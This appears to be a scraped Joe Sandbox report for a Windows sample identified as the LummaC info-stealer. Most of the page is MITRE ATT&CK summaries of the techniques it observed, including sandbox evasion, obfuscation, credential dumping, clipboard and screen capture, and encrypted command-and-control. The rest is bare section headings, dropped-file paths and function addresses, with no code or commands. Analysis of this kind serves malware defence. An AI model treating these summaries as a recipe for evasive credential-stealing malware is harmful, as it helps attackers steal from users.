Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lummm_lzmb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xalb31n.svo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spdv4gax.3i2.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
lummm_lzmb.exe

Function 07512780 Relevance: 1.6, APIs: 1, Instructions: 59
nativethreadCOMMON

Function 07512788 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Function 0758F668 Relevance: 1.5, Strings: 1, Instructions: 276
COMMON

Function 012B1FB0 Relevance: 1.5, Strings: 1, Instructions: 201
COMMON

Function 012B23EF Relevance: 3.9, Strings: 3, Instructions: 177
COMMON

Function 02E45748 Relevance: 3.0, Strings: 2, Instructions: 488
COMMON

Function 056E1813 Relevance: 2.8, Strings: 2, Instructions: 283
COMMON

Function 07512169 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 07512170 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 07511959 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 07511960 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 07511EF8 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Function 07511F00 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre